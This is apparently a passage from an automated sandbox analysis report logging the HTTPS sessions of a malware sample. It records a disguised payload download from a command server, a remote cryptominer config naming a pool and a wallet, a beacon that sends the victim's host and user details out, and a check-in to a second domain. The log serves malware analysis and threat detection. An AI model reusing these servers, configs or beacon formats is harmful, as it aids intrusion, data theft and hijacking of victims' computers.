                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.449776154.216.20.2434431260C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:14 UTC91OUTGET /77/uploads/Odavmyskfc.pdf HTTP/1.1
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-12-16 00:01:14 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:14 GMT
                                                                                                                                                                                              Content-Type: application/pdf
                                                                                                                                                                                              Content-Length: 5665288
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 21:16:41 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              ETag: "675f4739-567208"
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-12-16 00:01:14 UTC16121INData Raw: c0 f6 84 76 95 87 34 aa e4 e7 46 51 9b 21 60 24 53 46 5d 3f 89 b2 9d 4e e6 09 b9 a7 d7 a1 15 c7 5d 0e b9 15 2f c4 41 4c bc 9f 68 8e eb 7d 40 9b 2a 6f 0b 1c d5 65 33 ec c9 7e 9b 00 6f 85 8f c7 1d 49 92 b6 5b 9b 30 41 f1 a5 2d 6e 8b a3 ab fe 91 aa 41 ac 17 c4 91 be e0 5b b5 19 e3 49 96 e3 fa 50 06 b6 0e 5a 33 c2 d9 aa cc a1 11 44 41 1e bb dd 89 00 cd 85 02 df b3 ce 80 1a d5 43 57 10 a7 da 9f 99 34 77 73 ec 5c 91 5c 64 0e b4 4c c4 3c 57 43 95 ab a4 f7 2c 1a 42 94 54 72 be 37 08 d2 4b 0d 06 d9 16 a9 ca 3f 67 db cd ae 98 e8 bc 10 71 60 7c 42 c8 33 00 e5 80 b9 b3 d9 9b ea 16 5c 9d 38 8b 6e 9d cb e2 77 33 52 f4 8c 09 d8 7c 7c fa d0 27 2a 16 e8 b6 c3 11 23 e5 be 2a c3 fb 2a c9 33 67 d6 91 b8 63 88 22 49 aa c2 41 43 e7 05 af 68 69 05 9b 54 09 6f 92 66 b7 fa 7f 05
                                                                                                                                                                                              Data Ascii: v4FQ!`$SF]?N]/ALh}@*oe3~oI[0A-nA[IPZ3DACW4ws\\dL<WC,BTr7K?gq`|B3\8nw3R||'*#**3gc"IAChiTof
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: 9b 68 96 40 61 a5 8b 17 45 19 76 99 9d 32 64 a4 b9 74 86 6f 5b bc 1a 0e a6 75 2b a9 9f 61 c2 3a 35 4c 37 59 31 8e 30 26 bf b9 03 57 ca 68 dc f4 55 0c 66 97 f7 10 c5 65 d3 81 fb 2a 33 54 30 47 2a b3 00 bc 72 0e ab 7b 82 1c 2d 58 a8 92 ab 44 4c 09 78 96 c8 4f b3 bd a3 1e c7 63 5c 05 1e 1e a4 a9 b3 98 cf b4 da 82 96 cb a5 30 de 0e e0 cf df d2 3d d2 84 2f e7 d3 f4 93 22 4f f6 e0 36 ba d9 db 88 8e 6f a3 60 60 47 5e 19 52 16 bb 52 59 ea 7a a7 85 b5 7e e7 92 9d ac e8 47 d1 16 32 5a 90 67 e8 84 00 e9 17 65 13 20 3a 1e 8a a8 7b 04 76 43 bc 01 eb 52 da c0 ef 7b ba d0 1c e1 f1 27 9c 2e 90 e7 9a ea 60 6e 4e 41 24 c3 8b 21 0b 63 81 f4 a6 4a d9 5e 3f 88 df 88 b3 2a 14 f9 60 ad 7d 8a 6c d1 0d f5 ad 99 39 bd 77 77 53 09 fb 3a f7 ea 96 3e 4d 8a ae af 2e 58 9a ae 62 27 5a
                                                                                                                                                                                              Data Ascii: h@aEv2dto[u+a:5L7Y10&WhUfe*3T0G*r{-XDLxOc\0=/"O6o``G^RRYz~G2Zge :{vCR{'.`nNA$!cJ^?*`}l9wwS:>M.Xb'Z
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: d2 96 37 19 31 73 3a cd e2 bd 6c 6f fd a8 9e b7 05 f7 d7 60 f6 d9 52 b7 4a 89 fc 3f e6 cd 11 07 68 68 59 9a f0 ce 61 a8 cf b3 9b e8 75 50 00 70 2d 21 70 b7 24 30 43 69 2b 1a d2 e0 08 7a 2a 42 54 ed 19 df 8a d9 94 68 ba 82 5e 7d 0d 08 61 0b 98 7e d3 51 a5 c1 7b 42 fe 19 4e f5 b2 54 78 c4 8f 52 ef d1 cc 0a 50 75 fc 9b 5e 52 2d 4c 7b 17 26 00 4b 25 be 3e e0 32 d4 7d 99 82 3e 9b f0 09 c8 10 b9 80 55 c4 b1 77 63 a5 e7 7b b4 b3 d8 12 86 5f b8 b5 81 49 1c ba 09 17 4c 6c 43 fa 4c 6e eb e4 87 df e6 89 d7 eb 3b dc a3 8a f8 f8 3d 4e 17 af 08 14 65 20 71 44 6f 20 d9 7a 69 a5 0d 37 87 5b 25 2b e1 14 1c d2 b2 51 44 df e5 0e 48 fc 24 7e 84 2f 47 37 0c 10 aa 6a 97 d0 30 aa a2 31 34 db 0b 18 a2 c2 97 30 80 d0 ad ea 38 90 7b 41 ef fe 4a 35 0b bf 1a fd b2 94 7b 74 d5 0a 62
                                                                                                                                                                                              Data Ascii: 71s:lo`RJ?hhYauPp-!p$0Ci+z*BTh^}a~Q{BNTxRPu^R-L{&K%>2}>Uwc{_ILlCLn;=Ne qDo zi7[%+QDH$~/G7j01408{AJ5{tb
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: 06 d2 66 25 15 75 c4 c3 5f 67 76 25 e8 20 7b 4c 61 52 63 03 da 81 14 f8 05 87 c7 00 d3 6d 12 e5 6a 62 76 c6 ad f6 a9 72 21 b3 ea 5c b2 3b de a6 e9 30 06 21 7f b0 fb 06 3a a6 e1 22 34 64 db f7 72 b2 d7 e6 1e 6d d4 c1 4f 05 d3 c9 df df 8f 6b 20 00 ec 90 1f b4 74 1a 8f 15 5e 44 be 86 55 5c 6e d5 f8 18 cf 1e 1e e8 19 43 42 c0 ad fe d2 62 26 b5 7d 5d aa 2d 59 fc 54 ba 57 7c ed 51 cc 7a 6c 9a e6 8b 4c 3b 7b 8e 73 f8 bc ac 48 71 e5 9a 13 7e 0c 16 95 80 b3 1d ad 0d e0 12 d8 6f 8c cc 9f 3b d1 dc 7b d4 3d 7a 04 2e 72 b5 c0 b2 c9 11 74 49 57 87 c8 1b 65 73 85 8b 73 4a 48 2d 88 77 75 b0 62 ce 23 6e 78 75 cc d1 86 0c 1e 23 56 f9 78 57 f1 2a c1 06 4d 82 c0 52 df 60 9b c6 86 36 3b 30 ca e4 67 1d 64 5b cc 4d 4e 1c bf fc a8 12 1c 16 da 59 7d ac 49 da 4f 7c d4 8e 78 7d b6
                                                                                                                                                                                              Data Ascii: f%u_gv% {LaRcmjbvr!\;0!:"4drmOk t^DU\nCBb&}]-YTW|QzlL;{sHq~o;{=z.rtIWessJH-wub#nxu#VxW*MR`6;0gd[MNY}IO|x}
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: 9e 16 e4 74 ff a2 04 3a e7 c0 eb b1 9b 5a 5f b6 55 a6 61 f3 7a 05 1e 09 ef 41 3f 03 84 b7 cd ce e2 59 f0 91 80 1d 45 ae cd 26 68 1d f4 c2 5f 11 7e ab 76 34 7a 5d 9b bf d6 db 0a 22 eb 72 5a e2 32 2f dd 12 af 69 16 d2 13 a8 7e 6f bd 9c f9 74 a1 cf bb c4 18 25 00 d4 18 44 ca 2f 9f c7 6e 35 44 39 78 4e fa 5e a2 d5 c2 07 a0 93 17 23 ba d6 b2 f3 59 ec 98 64 4e f8 79 83 5c e5 fe f4 69 fc 8d b0 91 be 63 46 7d 5b 92 b8 6e 01 4e 20 70 41 eb 2b e0 ca 1f ba 36 20 f7 17 1b 50 9c 79 1e 98 6c e4 00 46 f5 5f 34 f7 36 37 30 0f 88 ca 58 6d 1d 70 d0 04 bb a9 f7 11 47 4c 58 f5 33 99 9b 76 b0 cc 11 91 11 e7 ac ee ce 32 1a 16 f3 36 7a 35 67 10 7b f3 20 73 84 d1 10 b3 74 5d ba 2a c3 af 90 e4 89 cf 85 d4 65 82 25 8d 57 45 8c 6c c5 ad cc 12 b9 18 42 f3 38 ce 1b 94 70 72 44 83 4b
                                                                                                                                                                                              Data Ascii: t:Z_UazA?YE&h_~v4z]"rZ2/i~ot%D/n5D9xN^#YdNy\icF}[nN pA+6 PylF_4670XmpGLX3v26z5g{ st]*e%WElB8prDK
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: ef 48 a5 0b 34 48 ab 14 62 60 8a c2 a3 6f 3a 8f 9f b6 a5 fa 35 0e 29 a5 18 d0 d9 9f 56 e6 a8 84 42 62 08 b5 d2 6b a7 b9 63 4a 19 5e c9 9a 58 91 66 a0 a2 2c 41 55 ee 51 7f 37 d5 86 fb bd 63 d3 eb b1 5f 5c 6b bf 35 fc 1b c7 ae 3c 15 a9 71 3e 40 d0 c0 cc fd f2 05 41 d8 e8 3d 1e 0b 8b 28 2e 71 6e 9b 78 7a 3b 82 0c 52 59 c2 18 8e a4 a9 4f 52 85 5e 1b 61 e8 98 14 25 ac ca fe 97 e0 0f 45 3f 48 57 47 ec 0d 9a f4 41 7d ac bf cc 06 d2 cf d1 dd 6d 3e 12 58 2b f0 ba b9 21 6d 7d 38 d0 26 67 f8 77 ef 28 f8 0f a5 cc 95 70 60 6b 3b 7c f5 e5 af fb 40 7c e2 26 4c 21 9f b2 90 b6 95 5b f6 d1 7b a9 fa 22 47 e4 a5 8d 8a 24 15 ea 2f af f5 28 c5 f7 b6 4e 5f 4e a1 5b 27 75 f3 5a 49 61 02 0e 25 df 8a bc cf b1 d2 99 00 54 6b a9 68 44 62 96 2c 80 4f 4a ef d4 97 74 9f bc 86 5f d4 2e
                                                                                                                                                                                              Data Ascii: H4Hb`o:5)VBbkcJ^Xf,AUQ7c_\k5<q>@A=(.qnxz;RYOR^a%E?HWGA}m>X+!m}8&gw(p`k;|@|&L![{"G$/(N_N['uZIa%TkhDb,OJt_.
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: 2d 1d eb f8 0d 7d ce 2f 94 3f f2 35 3a b9 21 31 7b 87 c9 16 f4 be 48 f8 e3 86 aa a0 56 29 04 7a d6 29 0b 1c 03 3e 2a 16 cb 03 dc fe ff 09 74 2d 1c 67 62 25 9a ee e8 1e f9 96 49 19 7c 7b 18 b9 4f 06 75 78 45 22 03 5a 6b e3 47 5e a1 63 3e 33 37 9e 71 92 e8 71 e0 4e 9f 26 62 9c 07 8d 4a 17 ff 96 46 bc b7 ba 8a 12 18 fb b6 a9 8c 8f 30 00 cf c3 ca 22 76 ed 10 7c 75 0a f8 77 f7 c5 85 44 b0 94 22 82 16 33 a4 13 9c e3 dd 99 67 41 0c 32 d9 7b 3b a3 b1 51 e6 74 be dd 05 37 d6 49 99 57 f6 9a 3c 8d 40 57 e9 cd 56 7f a7 50 71 ce b9 d5 b4 c9 3e 41 0c 97 46 ae 4a d3 9c 22 ac 69 2e e5 47 2d 56 21 89 e6 b2 a3 0c c5 e0 69 13 c8 63 77 1a 76 0f ee a7 67 16 28 9b 77 91 f9 c6 84 5a fb ff 4b ed 78 5b 0a 27 a3 ac a9 a7 50 8d eb 9d 40 82 89 23 84 d3 62 d4 a6 ca bf 44 e8 48 d6 71
                                                                                                                                                                                              Data Ascii: -}/?5:!1{HV)z)>*t-gb%I|{OuxE"ZkG^c>37qqN&bJF0"v|uwD"3gA2{;Qt7IW<@WVPq>AFJ"i.G-V!icwvg(wZKx['P@#bDHq
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: d4 58 34 7d 27 78 c5 1d 63 d9 c5 2d 01 91 5e 81 d9 d9 94 e2 d9 72 e5 ff 0f a7 f0 25 1b ea 14 0c 13 26 40 fe a2 cb f2 83 50 c6 9e 87 a7 01 8d 10 11 b1 25 24 34 39 cc eb 0c 73 ef cc b5 7e 0b 31 c6 98 db e9 87 6d 13 c1 26 65 22 1f 79 84 4a 27 11 a9 61 c6 9a 20 d7 3a da 16 df e5 55 cf 00 9f a6 29 28 09 3e c1 eb f9 ad 62 0b 47 69 a0 7e 65 60 02 f8 3c ea 4e b2 95 82 92 c8 1c c8 27 82 3d 29 29 df c1 58 83 29 33 c2 b4 73 cf 16 b0 2c 1e 19 70 64 de 36 d1 de f2 6a 96 ed dd ce a9 64 3f b2 ca 5d 21 e4 f9 9c c4 50 45 94 04 ee 6e 4f c9 d8 4a 99 c5 96 b5 89 ab c0 eb 66 90 94 7d 2b 70 b0 2d ad 8b e2 b5 bc d0 ea 86 db 33 56 c6 cb af f3 f0 69 a7 27 59 87 1b f5 13 5b 5d 71 9c a4 8d 01 82 56 0f fa 88 db 1e e4 0e b3 70 15 d5 f6 d9 76 1e 1a 31 c1 cb 17 67 89 91 cc ea e7 f2 7e
                                                                                                                                                                                              Data Ascii: X4}'xc-^r%&@P%$49s~1m&e"yJ'a :U)(>bGi~e`<N'=))X)3s,pd6jd?]!PEnOJf}+p-3Vi'Y[]qVpv1g~
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: 09 59 63 b0 49 85 74 1f d0 0b 7f 5a b1 5a 4b a9 28 5f da e5 c1 b1 17 ca 66 33 f4 30 fd 1c d3 0d 6c fb 75 0c 21 27 eb 95 68 cc 61 64 ec 87 b7 5d bd 2f cb ce 42 12 6b 01 be e2 f0 b4 e4 30 a7 b5 2f a0 50 30 2e e0 d8 85 20 45 a5 c9 ae 67 c4 7f af 61 13 c8 c6 01 c8 18 25 5e cf 7b d4 a0 2c 3e e3 c5 85 44 b6 58 9e 0c a2 e5 1e 9d b9 97 ba fc 60 4f fd 8b c2 d7 26 13 e1 05 59 59 40 05 d8 e1 7a 5f d7 a4 02 39 6f 65 86 94 64 1a 32 97 e3 c9 24 14 15 8a e6 53 fa bb 97 e5 50 85 b7 02 4f 7a 47 be 3d e1 3e 03 07 78 79 1a 5f 90 72 ae 90 b5 c7 d5 fd f4 44 0e 9a 51 4d aa c2 cb 9f 8c a0 74 c9 99 1b 1f d9 bf e1 9b 32 1c d3 16 e8 64 1e 6b 9c 16 a8 cf fc 3b 16 d7 c5 b6 14 8a d9 03 0e 6d d8 48 d1 ee 24 50 2f 32 0f 5d 0a 01 95 66 a5 53 85 7e d9 af 7a 00 83 94 02 e5 02 fb 47 e6 0e
                                                                                                                                                                                              Data Ascii: YcItZZK(_f30lu!'had]/Bk0/P0. Ega%^{,>DX`O&YY@z_9oed2$SPOzG=>xy_rDQMt2dk;mH$P/2]fS~zG
                                                                                                                                                                                              2024-12-16 00:01:15 UTC16384INData Raw: 9c 8d 7a 6b b8 9f 99 eb d5 91 c0 c6 da 5e 51 85 93 57 34 91 c8 f7 ec 1e 86 4b 9d 97 3d 79 e6 de 7d 42 b0 3f 4c 86 c1 29 5e b0 1e 9f 2a b1 b1 06 c6 18 3b d9 5a fd 77 84 21 c8 3c ce b1 7d a9 d2 04 89 c3 3d 56 0c 08 cf ff e2 e7 23 93 22 58 e6 1c 95 56 77 5b ee 3b 26 07 28 59 94 49 53 f4 1f 4d 4d e7 1f 19 81 8a 98 09 10 ac b7 6d dd 87 bb 93 a4 f3 ad 05 2a ec 8b 1e 13 31 ff 86 fb aa d2 df 34 ac cb 25 2d e5 ba 7d 6f d5 6e 97 43 45 c0 fe 2b 4c 85 dc bf 7d 54 5e 12 74 d6 ab 5e 8b b8 b9 74 8b 17 5d a5 73 ba 0c 32 8f 51 36 4f 20 d4 db 8f be 77 24 02 da 39 04 33 76 ec e0 c7 88 77 4e 1f 63 3f 82 8e 24 39 02 32 ad 18 eb 9a 87 40 c4 aa 26 b4 b4 d4 00 ea bb b9 0e 35 5a cb 23 cb 1a eb 7e 3a 38 1f 9d fb 14 a1 e3 40 88 d7 a4 d7 5f 6e 0c 9f ba 2b 54 e4 80 be 0b be b2 04 0e
                                                                                                                                                                                              Data Ascii: zk^QW4K=y}B?L)^*;Zw!<}=V#"XVw[;&(YISMMm*14%-}onCE+L}T^t^t]s2Q6O w$93vwNc?$92@&5Z#~:8@_n+T


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              1192.168.2.449828154.216.20.2434435676C:\Windows\explorer.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:34 UTC111OUTGET /P.txt HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                                                                                              2024-12-16 00:01:34 UTC252INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:34 GMT
                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                              Content-Length: 1034
                                                                                                                                                                                              Last-Modified: Sat, 14 Dec 2024 11:58:20 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              ETag: "675d72dc-40a"
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-12-16 00:01:34 UTC1034INData Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 20
                                                                                                                                                                                              Data Ascii: { "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": true,


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.449835154.216.20.2434435676C:\Windows\explorer.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:36 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Content-Length: 336
                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              User-Agent: cpp-httplib/0.12.6
                                                                                                                                                                                              2024-12-16 00:01:36 UTC336OUTData Raw: 7b 22 69 64 22 3a 22 74 6a 61 6c 76 6a 68 74 67 78 6a 62 66 66 67 71 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 32 30 36 33 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6a 6f 6e 65 73 22 2c 22 67 70 75 22 3a 22 31 59 45 32 4b 4f 47 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22 43 3a
                                                                                                                                                                                              Data Ascii: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:
                                                                                                                                                                                              2024-12-16 00:01:36 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:36 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Powered-By: PHP/8.3.14
                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              2024-12-16 00:01:36 UTC28INData Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 11{"response":"ok"}0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.449854104.21.79.74436976C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:42 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:01:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                              2024-12-16 00:01:43 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:43 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: PHPSESSID=2os3c96jhe10a90q5do7iuu7ka; expires=Thu, 10-Apr-2025 17:48:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T82IUbSUlnEzGqKyV4CAJ9pyX7ojfaqD2GEuPXobO5RxcXCxpWs3i3Ng79Ehy0HoYQTISaA8B966DWUvDteMQsEnDwnIrRnKVumwU4yGm5TRxJWBkIb1po7lH%2Br%2BqklXLgODUkU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a6680cbba8c72-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1911&rtt_var=752&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1422308&cwnd=174&unsent_bytes=0&cid=0c9af43e9b908dfc&ts=1196&x=0"
                                                                                                                                                                                              2024-12-16 00:01:43 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                              2024-12-16 00:01:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.449859154.216.20.2434431784C:\Users\user\AppData\Roaming\IsStopped.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:01:44 UTC91OUTGET /77/uploads/Odavmyskfc.pdf HTTP/1.1
                                                                                                                                                                                              Host: woo097878781.win
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-12-16 00:01:45 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                              Date: Mon, 16 Dec 2024 00:01:45 GMT
                                                                                                                                                                                              Content-Type: application/pdf
                                                                                                                                                                                              Content-Length: 5665288
                                                                                                                                                                                              Last-Modified: Sun, 15 Dec 2024 21:16:41 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              ETag: "675f4739-567208"
                                                                                                                                                                                              X-Powered-By: PleskLin
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16121INData Raw: c0 f6 84 76 95 87 34 aa e4 e7 46 51 9b 21 60 24 53 46 5d 3f 89 b2 9d 4e e6 09 b9 a7 d7 a1 15 c7 5d 0e b9 15 2f c4 41 4c bc 9f 68 8e eb 7d 40 9b 2a 6f 0b 1c d5 65 33 ec c9 7e 9b 00 6f 85 8f c7 1d 49 92 b6 5b 9b 30 41 f1 a5 2d 6e 8b a3 ab fe 91 aa 41 ac 17 c4 91 be e0 5b b5 19 e3 49 96 e3 fa 50 06 b6 0e 5a 33 c2 d9 aa cc a1 11 44 41 1e bb dd 89 00 cd 85 02 df b3 ce 80 1a d5 43 57 10 a7 da 9f 99 34 77 73 ec 5c 91 5c 64 0e b4 4c c4 3c 57 43 95 ab a4 f7 2c 1a 42 94 54 72 be 37 08 d2 4b 0d 06 d9 16 a9 ca 3f 67 db cd ae 98 e8 bc 10 71 60 7c 42 c8 33 00 e5 80 b9 b3 d9 9b ea 16 5c 9d 38 8b 6e 9d cb e2 77 33 52 f4 8c 09 d8 7c 7c fa d0 27 2a 16 e8 b6 c3 11 23 e5 be 2a c3 fb 2a c9 33 67 d6 91 b8 63 88 22 49 aa c2 41 43 e7 05 af 68 69 05 9b 54 09 6f 92 66 b7 fa 7f 05
                                                                                                                                                                                              Data Ascii: v4FQ!`$SF]?N]/ALh}@*oe3~oI[0A-nA[IPZ3DACW4ws\\dL<WC,BTr7K?gq`|B3\8nw3R||'*#**3gc"IAChiTof
                                                                                                                                                                                              2024-12-16 00:01:45 UTC16384INData Raw: 9b 68 96 40 61 a5 8b 17 45 19 76 99 9d 32 64 a4 b9 74 86 6f 5b bc 1a 0e a6 75 2b a9 9f 61 c2 3a 35 4c 37 59 31 8e 30 26 bf b9 03 57 ca 68 dc f4 55 0c 66 97 f7 10 c5 65 d3 81 fb 2a 33 54 30 47 2a b3 00 bc 72 0e ab 7b 82 1c 2d 58 a8 92 ab 44 4c 09 78 96 c8 4f b3 bd a3 1e c7 63 5c 05 1e 1e a4 a9 b3 98 cf b4 da 82 96 cb a5 30 de 0e e0 cf df d2 3d d2 84 2f e7 d3 f4 93 22 4f f6 e0 36 ba d9 db 88 8e 6f a3 60 60 47 5e 19 52 16 bb 52 59 ea 7a a7 85 b5 7e e7 92 9d ac e8 47 d1 16 32 5a 90 67 e8 84 00 e9 17 65 13 20 3a 1e 8a a8 7b 04 76 43 bc 01 eb 52 da c0 ef 7b ba d0 1c e1 f1 27 9c 2e 90 e7 9a ea 60 6e 4e 41 24 c3 8b 21 0b 63 81 f4 a6 4a d9 5e 3f 88 df 88 b3 2a 14 f9 60 ad 7d 8a 6c d1 0d f5 ad 99 39 bd 77 77 53 09 fb 3a f7 ea 96 3e 4d 8a ae af 2e 58 9a ae 62 27 5a
                                                                                                                                                                                              Data Ascii: h@aEv2dto[u+a:5L7Y10&WhUfe*3T0G*r{-XDLxOc\0=/"O6o``G^RRYz~G2Zge :{vCR{'.`nNA$!cJ^?*`}l9wwS:>M.Xb'Z
